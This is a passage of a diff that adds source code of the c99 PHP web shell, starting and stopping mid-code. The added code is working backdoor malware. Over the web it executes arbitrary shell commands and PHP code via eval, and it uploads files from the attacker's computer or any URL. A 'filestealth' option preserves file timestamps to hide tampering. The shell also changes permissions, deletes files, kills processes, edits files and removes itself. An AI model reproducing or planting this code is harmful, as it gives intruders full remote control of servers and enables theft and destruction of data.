+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
